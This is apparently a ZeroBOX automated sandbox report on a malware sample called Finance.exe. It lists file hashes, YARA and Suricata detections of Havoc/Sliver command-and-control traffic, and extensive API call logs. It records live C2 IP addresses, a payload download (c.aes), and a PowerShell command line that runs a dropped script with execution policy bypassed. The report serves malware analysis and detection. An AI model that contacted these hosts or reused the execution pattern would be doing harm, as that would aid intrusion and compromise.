popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Finance.exe

Generic Malware Malicious Library Antivirus UPX .NET DLL AntiDebug PE64 DLL PE32 PE File AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 29, 2025, 10:23 a.m. April 29, 2025, 10:29 a.m.
Size 117.0KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 70dbf2129ad10943c505dfc8f75a0e12
SHA256 6f783fddc42681870d2a3184acff7a68833c212b7e8e34c5b92aee88f16d66f7
CRC32 E91043BE
ssdeep 3072:Jpvb7RV/8hhb3dLUK94IgqHniOSyaZoc7QNPnP9TBfWSE6j:z9VkhhrdYK94IgqHniOSyaZoc7QNPnPD
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
212.227.245.12 Active Moloch
85.215.173.244 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 85.215.173.244:443 -> 192.168.56.101:49187 2037697 ET ATTACK_RESPONSE Havoc/Sliver Framework TLS Certificate Observed A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49187
85.215.173.244:443 		C=US, ST=Connecticut, L=Norwalk, unknown=, unknown=2556, O=Synergy Co, CN=85.215.173.244 C=US, ST=Connecticut, L=Norwalk, unknown=, unknown=2556, O=Synergy Co, CN=85.215.173.244 6c:c5:54:c3:e2:0a:00:ac:3a:29:5a:b9:12:8c:c5:5c:56:88:dc:20

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000000046df40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5967e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5967e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5967e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5967e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5967e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596310
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596310
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596310
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596310
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596d20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596d20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596d20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5971f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5971f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5971f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596b60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596b60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597260
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597260
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597260
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000000046de60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000000046de60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000000046e1e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000000046e1e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5bdf80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5bdf80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000291620
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000000029d530
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a8c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002b53c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a8c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a8c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a8c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002b5610
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ba0a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ba0a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .code
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://212.227.245.12/c.aes
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST https://85.215.173.244/
request GET http://212.227.245.12/c.aes
request POST https://85.215.173.244/
request POST https://85.215.173.244/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 1572864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002aa0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ba0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e20000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e20000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e20000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e20000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e20000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ba2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ba4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00132000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00045000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00180000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00046000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00133000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0003a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00181000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ba7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\F30A.tmp\F31B.tmp\F31C.ps1
file c:\Users\test22\AppData\Local\Temp\dsbups9j.dll
file c:\Users\test22\AppData\Local\Temp\wb0pvs3w.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell –NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\F30A.tmp\F31B.tmp\F31C.ps1
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\F30A.tmp\F31B.tmp\F31C.ps1
file C:\Users\test22\AppData\Local\Temp\dsbups9j.dll
file C:\Users\test22\AppData\Local\Temp\wb0pvs3w.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: –NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\F30A.tmp\F31B.tmp\F31C.ps1
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 98304
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000000001cab0000
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
section {u'size_of_data': u'0x00000c00', u'virtual_address': u'0x00020000', u'entropy': 7.229365069526266, u'name': u'.rsrc', u'virtual_size': u'0x00000b54'} entropy 7.22936506953 description A section with a high entropy has been found
Data received HTTP/1.1 200 OK Date: Tue, 29 Apr 2025 01:28:18 GMT Server: Apache/2.4.63 (Debian) Last-Modified: Sun, 27 Apr 2025 17:34:20 GMT ETag: "19600-633c5fa3cbc8b" Accept-Ranges: bytes Content-Length: 103936 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Ø|êùæçés¢Ì¤xåÄ?¦³[z_õ¯ÀÔÜ-÷.l}ˆùÿ· TŸ74)fâQ§Ýì‡Î39æâ0Fziìã*3(ü%pa«ŒcrECÏnÙÀKý¿×íã¬ÿ\Ϗ¡š˜m®ÖÔ{­ú…s·Rç:‰çœmc»OrnyÃQ( Póc Ij ]^`ÃÃaìµ6TÑ&fM䮾Æ÷äéþK-ž–Nnj¸\ÿ6™_ݲùsüíNI´,M¬UȎ®ÌÛ¨|sñ†6­šv#¹ä&žáHݞÌ'i࣭ó¡}¸ÈëæO.#u#×tuäjxìÕóÒgv'KòA™ºÛaðÕ!mѱ7—ýîK 9rþ[ŽÓ·*ÍT,”ûL¡úF_ôt§Êç• ¬5±Àü±ýÂiü Ïàß1ï d¯0Gmà"ó-~ìP$™(‚ñ?9õïó¼ª7õ‹TH³_çżÝÆ]͟ûÔZ’9¨r³c…tg3YŽåY^û§„ÂTô3ù&\" pg)cWLùÖºhÜý…¸äÖqίõs¬Ï·+»ê^%"e³{B‡ýBJ00q˜FçÆâ:Íåy_§ø›à1¥–õ‹Usl¼*X­^øÁtàHrů}D}Ð/‚Adß(·$…6X|_m·ojâÿ…¤pŽ]Än—Îy»8 •;·‚2ƒË0Wƒ§–ÒùaHÛPbñT ’ÌØ×PqÇ-œõ°Uva´š}ó›B(b¡CÖué½a5ÛöyMŠâÂN"s±ÕBÄ‹9âàÙqDߓšÑßŋÔVH&nÆÁ¸ 3>ö¢•õX­žåy—a”cŽÿ3ÞÁíܑ,Á™QïÁ.@¦eÞãé¦Q»Rìȏ”˜9Ÿ2m€¬a°ãÔòìþ£÷Š¹M ”×FL][sªW©ô@«7õ52tQª4P_¸lR1toÊ¥MŗÃO4rö"*¯²t!)¾s]‰ÙbÉÖF« ÷MU†EÃÝåP.éÛMORéÔ³ÙLèLèñ‹"Õ Ÿ'cÒvšˆaiâ(- ×-3”!W2mWç†BQfkg“¸¦õ‡×°“ۃ¬,­7\7ћ ~e¶“++Š$÷ ®€©bIlå_‡Õt½”s4ä¥ve¥Õ*x&%Vø†+ú«úéþhìŒy%øw–%ÿP«ð©Éà¹Rå„K8È£` \-Á%7a”à”¤Ÿ²Ž\Oñ@iºÖ"0ä;>´3Ž Jª~Î%GŒq ,tÐÚß[ßu~Ýô?¥è„e1°YÕn â{º+ †û¤fÓ¼Ý`V’ÀÚ±”®Nñ¤UlÔ55ë`+8éDúNZQâÓ¿Î3v 